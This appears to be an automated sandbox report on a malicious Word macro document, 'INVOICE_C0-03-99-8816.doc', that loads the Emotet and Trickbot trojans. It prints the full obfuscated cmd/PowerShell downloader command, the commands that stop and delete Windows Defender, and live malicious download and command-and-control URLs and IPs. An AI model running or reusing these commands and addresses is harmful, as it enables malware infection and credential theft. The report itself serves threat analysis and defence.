File name: INVOICE_C0-03-99-8816.doc

Full analysis: https://app.any.run/tasks/1eb6a9a4-1f7a-4fa4-bb2d-c4cefd4e079f
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it has been upgraded into very destructive malware. It mostly targets corporate victims, but private users are also infected through mass spam email campaigns.

Analysis date: November 08, 2018, 08:07:27
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: macros, macros-on-open, generated-doc, trojan, loader, emotet, feodo, evasion, trickbot, stealer, maldoc-4
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Cole-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Nov 8 03:58:00 2018, Last Saved Time/Date: Thu Nov 8 03:58:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0
MD5: 5E85C3EBED20DC34766E9B1DB3CB8740
SHA1: 90A1B85EEF0DFECBA2D7A7AA63E60C290FC59706
SHA256: F5157BB10F4869655706640C47F5DEDD2A97A8FFD49284FFF261427521F66BEB
SSDEEP: 768:L9EVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o92pw6ZCrrjIu:L9Eocn1kp59gxBK85fBt+a91j

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3724)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3724)
    • Application was dropped or rewritten from another process

      • 232.exe (PID: 2080)
      • 232.exe (PID: 3956)
      • lpiograd.exe (PID: 3108)
      • lpiograd.exe (PID: 1004)
      • 2tLCxMSHM32joaoIg.exe (PID: 2744)
      • 2tMDxMSIM32joaoJg.exe (PID: 3148)
      • 2tMDxMSIM32joaoJg.exe (PID: 3196)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3088)
      • svchost.exe (PID: 1012)
    • EMOTET was detected

      • lpiograd.exe (PID: 1004)
    • FEODO was detected

      • lpiograd.exe (PID: 1004)
    • Connects to CnC server

      • lpiograd.exe (PID: 1004)
      • 2tMDxMSIM32joaoJg.exe (PID: 3196)
    • Changes the autorun value in the registry

      • lpiograd.exe (PID: 1004)
    • Known privilege escalation attack

      • DllHost.exe (PID: 3372)
    • Loads the Task Scheduler COM API

      • 2tMDxMSIM32joaoJg.exe (PID: 3196)
      • 2tMDxMSIM32joaoJg.exe (PID: 3148)
    • Stealing of credential data

      • svchost.exe (PID: 4064)
    • Uses SVCHOST.EXE for hidden code execution

      • 2tMDxMSIM32joaoJg.exe (PID: 3196)
    • Downloads executable files with a strange extension

      • svchost.exe (PID: 1012)
    • Trickbot detected

      • 2tMDxMSIM32joaoJg.exe (PID: 3196)
    • Downloads executable files from IP

      • svchost.exe (PID: 1012)
  • SUSPICIOUS

    • Executes PowerShell scripts

      • CMD.exe (PID: 1920)
      • cmd.exe (PID: 120)
      • cmd.exe (PID: 3700)
    • Creates files in the user directory

      • powershell.exe (PID: 3088)
      • 2tLCxMSHM32joaoIg.exe (PID: 2744)
      • powershell.exe (PID: 3776)
      • powershell.exe (PID: 3344)
      • 2tMDxMSIM32joaoJg.exe (PID: 3196)
      • svchost.exe (PID: 1012)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3088)
      • 232.exe (PID: 3956)
      • lpiograd.exe (PID: 1004)
      • 2tLCxMSHM32joaoIg.exe (PID: 2744)
      • svchost.exe (PID: 1012)
    • Starts itself from another location

      • 232.exe (PID: 3956)
    • Starts SC.EXE for service management

      • cmd.exe (PID: 1052)
      • cmd.exe (PID: 2288)
      • cmd.exe (PID: 3424)
      • cmd.exe (PID: 3456)
    • Creates files in the program directory

      • lpiograd.exe (PID: 1004)
      • 2tMDxMSIM32joaoJg.exe (PID: 3196)
    • Starts CMD.EXE for commands execution

      • 2tLCxMSHM32joaoIg.exe (PID: 2744)
      • 2tMDxMSIM32joaoJg.exe (PID: 3148)
      • svchost.exe (PID: 3676)
    • Checks for external IP

      • 2tMDxMSIM32joaoJg.exe (PID: 3196)
    • Connects to unusual port

      • 2tMDxMSIM32joaoJg.exe (PID: 3196)
      • svchost.exe (PID: 4064)
    • Creates files in the Windows directory

      • 2tMDxMSIM32joaoJg.exe (PID: 3196)
    • Removes files from Windows directory

      • 2tMDxMSIM32joaoJg.exe (PID: 3196)
    • Starts NET.EXE for network exploration

      • cmd.exe (PID: 2128)
      • cmd.exe (PID: 3112)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3724)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3724)
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 14
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 13
Words: 2
Pages: 1
ModifyDate: 2018:11:08 03:58:00
CreateDate: 2018:11:08 03:58:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Cole-PC
Subject: -
Title: -
Total processes: 88
Monitored processes: 37
Malicious processes: 10
Suspicious processes: 4

Behavior graph

[Interactive process graph, available in the full report. Processes shown: winword.exe, cmd.exe, powershell.exe, 232.exe, lpiograd.exe (#EMOTET), 2tlcxmshm32joaoig.exe, sc.exe, CMSTPLUA, 2tmdxmsim32joaojg.exe (#TRICKBOT), svchost.exe, ipconfig.exe, net.exe, net1.exe]

Process information

PID: 3724
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\INVOICE_C0-03-99-8816.doc"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 14.0.6024.1000

PID: 1920
CMD: CMD C:\wIndowS\sySTem32\CMD.ExE /C "SeT FYB=^& ((Gv '*mDr*').nAme[3,11,2]-joIN'') ( NeW-oBJecT io.StrEAMReAder((NeW-oBJecT SysTEm.iO.CoMprESSiOn.DEfLAtestrEAM( [sySTeM.IO.mEMORysTrEAm] [SysTEm.conveRt]::FrOMBASE64STrinG( 'TZBda8IwGIX/Si8CUZwpc4OhoSDq5vxAhLk5YTdJ+jbNTBPXxsYi/vdV3cDb8xweDgf9iE1kwLct/wbhggU4sgY+1AqMo2j2MY5w6tyuF4bcHmwilZQaCiJsFq6Kp+1g3d3I/l9DsJxbwysHFy4XJSzL4b644aqQ7Aq9y6v1/B9574l03uY6ZoLFkFXEA08Vv6qmw/dDOug839ZZZS2HeC+YU9Yw7fJ94YgyYf44SzYuuZ9+YvK208o1cB83KcpWyyAKcOehgymyk3mEwJQ9B9muhb9w68xbmMABME1sDkykDTR+HQXKBOcjmsd68RHVh5GR9UZbFr8oDZfOXXAWNunElHYL7UktvSSU154tPdUbRXo8nX4B') , [IO.comPResSiOn.COmpRessionmOde]::dECOmpReSs ) ) ,[SYsTEm.tEXT.ENCoDiNG]::AScII)).reAdTOeNd() && POweRsheLL sEt-ITEM ( 'va' + 'Riab'+'l' + 'e:l9eS' + '2' ) ( [TYPe](\"{1}{2}{0}\" -F'ronMent','EN','vI' ) ) ; ( (Gci ( 'Va' + 'RiAb'+'l' + 'e:L9ES' + '2') ).VALUE::(\"{2}{0}{1}{4}{3}\" -f 'ETENV','IRoNmENtV','G','ABLE','ARI' ).Invoke('fYB',(\"{0}{2}{1}\"-f 'pRo','s','cEs' ) )) ^| . ( ( ^& ('Gv') ( \"{0}{1}\"-f '*MD','r*' )).\"N`AMe\"[3,11,2]-jOiN'' )"
Path: C:\Windows\system32\CMD.exe
Parent process: WINWORD.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 3088
CMD: POweRsheLL sEt-ITEM ( 'va' + 'Riab'+'l' + 'e:l9eS' + '2' ) ( [TYPe](\"{1}{2}{0}\" -F'ronMent','EN','vI' ) ) ; ( (Gci ( 'Va' + 'RiAb'+'l' + 'e:L9ES' + '2') ).VALUE::(\"{2}{0}{1}{4}{3}\" -f 'ETENV','IRoNmENtV','G','ABLE','ARI' ).Invoke('fYB',(\"{0}{2}{1}\"-f 'pRo','s','cEs' ) )) | . ( ( & ('Gv') ( \"{0}{1}\"-f '*MD','r*' )).\"N`AMe\"[3,11,2]-jOiN'' )
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: CMD.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 2080
CMD: "C:\Users\admin\AppData\Local\Temp\232.exe"
Path: C:\Users\admin\AppData\Local\Temp\232.exe
Parent process: powershell.exe
User: admin
Company: Micro
Integrity Level: MEDIUM
Description: Microsof
Exit code: 0
Version: 2

PID: 3956
CMD: "C:\Users\admin\AppData\Local\Temp\232.exe"
Path: C:\Users\admin\AppData\Local\Temp\232.exe
Parent process: 232.exe
User: admin
Company: Micro
Integrity Level: MEDIUM
Description: Microsof
Exit code: 0
Version: 2

PID: 3108
CMD: "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"
Path: C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
Parent process: 232.exe
User: admin
Company: Micro
Integrity Level: MEDIUM
Description: Microsof
Exit code: 0
Version: 2

PID: 1004
CMD: "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"
Path: C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
Parent process: lpiograd.exe
User: admin
Company: Micro
Integrity Level: MEDIUM
Description: Microsof
Version: 2

PID: 2744
CMD: "C:\ProgramData\2tLCxMSHM32joaoIg.exe"
Path: C:\ProgramData\2tLCxMSHM32joaoIg.exe
Parent process: lpiograd.exe
User: admin
Integrity Level: MEDIUM
Description: Developed using the Dev-C++ IDE
Exit code: 0
Version: 1.0.0.0

PID: 2288
CMD: /c sc stop WinDefend
Path: C:\Windows\system32\cmd.exe
Parent process: 2tLCxMSHM32joaoIg.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 5
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 1052
CMD: /c sc delete WinDefend
Path: C:\Windows\system32\cmd.exe
Parent process: 2tLCxMSHM32joaoIg.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 5
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events: 2 631
Read events: 2 090
Write events: 0
Delete events: 0

Modification events

No data

Executable files: 5
Suspicious files: 27
Text files: 4
Unknown types: 5

Dropped files

PID | Process | Filename
3724 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR3052.tmp.cvr
3088 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6SWZ2I2IEOZ9118SZLHD.temp
3776 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TI3UO3FT3CHNPDDXVLKF.temp
3344 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IN7J1CI6D1ELRFIOGKTG.temp
3196 | 2tMDxMSIM32joaoJg.exe | C:\Windows\TEMP\Tar8E67.tmp
3196 | 2tMDxMSIM32joaoJg.exe | C:\Windows\TEMP\Cab8ED6.tmp
3196 | 2tMDxMSIM32joaoJg.exe | C:\Windows\TEMP\Tar8ED7.tmp
3196 | 2tMDxMSIM32joaoJg.exe | C:\Windows\TEMP\CabA4F0.tmp
3196 | 2tMDxMSIM32joaoJg.exe | C:\Windows\TEMP\TarA4F1.tmp
3088 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
    MD5: 2E6C332796340AFFBFF5230455889D0D
    SHA256: 6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E

(No MD5/SHA256 values are given for the other dropped files.)
HTTP(S) requests: 12
TCP/UDP connections: 14
DNS requests: 8
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
3088 | powershell.exe | GET | 200 | 50.62.102.1:80 | http://boxofgiggles.com/Ts7kBW9Yg/ | US | executable | 132 Kb | malicious
1004 | lpiograd.exe | GET | 200 | 47.157.181.81:443 | http://47.157.181.81:443/ | US | binary | 132 b | malicious
1004 | lpiograd.exe | GET | 200 | 47.157.181.81:443 | http://47.157.181.81:443/whoami.php | US | text | 13 b | malicious
3196 | 2tMDxMSIM32joaoJg.exe | GET | 200 | 8.248.121.254:80 | http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab | US | compressed | 54.4 Kb | whitelisted
4064 | svchost.exe | POST | 200 | 24.247.181.125:8082 | http://24.247.181.125:8082/del92/PC_W617601.8FD9427BC717562E8091001D7B675693/81/ | US | text | 3 b | suspicious
4064 | svchost.exe | POST | 200 | 24.247.181.125:8082 | http://24.247.181.125:8082/del92/PC_W617601.8FD9427BC717562E8091001D7B675693/83/ | US | text | 3 b | suspicious
1012 | svchost.exe | GET | 200 | 192.227.186.151:80 | http://192.227.186.151/radiance.png | US | executable | 428 Kb | suspicious
4064 | svchost.exe | POST | 200 | 24.247.181.125:8082 | http://24.247.181.125:8082/del92/PC_W617601.8FD9427BC717562E8091001D7B675693/81/ | US | text | 3 b | suspicious
1004 | lpiograd.exe | GET | 200 | 187.163.174.149:8080 | http://187.163.174.149:8080/ | MX | binary | 148 b | malicious
3088 | powershell.exe | GET | 301 | 50.62.102.1:80 | http://boxofgiggles.com/Ts7kBW9Yg | US | html | 308 b | malicious

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
3196 | 2tMDxMSIM32joaoJg.exe | 74.134.5.113:449 | - | Time Warner Cable Internet LLC | US | unknown
3196 | 2tMDxMSIM32joaoJg.exe | 34.233.102.38:80 | checkip.amazonaws.com | Amazon.com, Inc. | US | shared
1004 | lpiograd.exe | 187.163.174.149:8080 | - | Axtel, S.A.B. de C.V. | MX | malicious
3088 | powershell.exe | 50.62.102.1:80 | boxofgiggles.com | GoDaddy.com, LLC | US | malicious
1004 | lpiograd.exe | 47.157.181.81:443 | - | Frontier Communications of America, Inc. | US | malicious
3196 | 2tMDxMSIM32joaoJg.exe | 8.248.121.254:80 | www.download.windowsupdate.com | Level 3 Communications, Inc. | US | unknown
4064 | svchost.exe | 24.247.181.125:8082 | - | Charter Communications | US | suspicious
1012 | svchost.exe | 192.227.186.151:80 | - | ColoCrossing | US | suspicious
3196 | 2tMDxMSIM32joaoJg.exe | 92.38.135.209:447 | - | - | RU | suspicious

DNS requests

Domain | IP | Reputation
boxofgiggles.com | 50.62.102.1 | malicious
checkip.amazonaws.com | 34.233.102.38, 34.192.84.239, 107.23.175.217, 52.1.46.34, 52.202.139.131, 52.204.60.216 | shared
www.download.windowsupdate.com | 8.248.121.254, 67.26.137.254, 8.253.204.120, 67.27.233.126, 8.253.95.121 | whitelisted
18.89.147.217.zen.spamhaus.org | - | unknown
18.89.147.217.b.barracudacentral.org | - | unknown
18.89.147.217.cbl.abuseat.org | - | unknown
18.89.147.217.dnsbl-1.uceprotect.net | - | unknown
18.89.147.217.spam.dnsbl.sorbs.net | - | unknown

Threats

PID | Process | Class | Message
3088 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
3088 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP
3088 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3088 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP
1004 | lpiograd.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request
1004 | lpiograd.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request
3196 | 2tMDxMSIM32joaoJg.exe | Not Suspicious Traffic | ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)
3196 | 2tMDxMSIM32joaoJg.exe | A Network Trojan was detected | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)
3196 | 2tMDxMSIM32joaoJg.exe | Not Suspicious Traffic | ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)
3196 | 2tMDxMSIM32joaoJg.exe | Not Suspicious Traffic | ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)
8 ETPRO signatures available at the full report
No debug info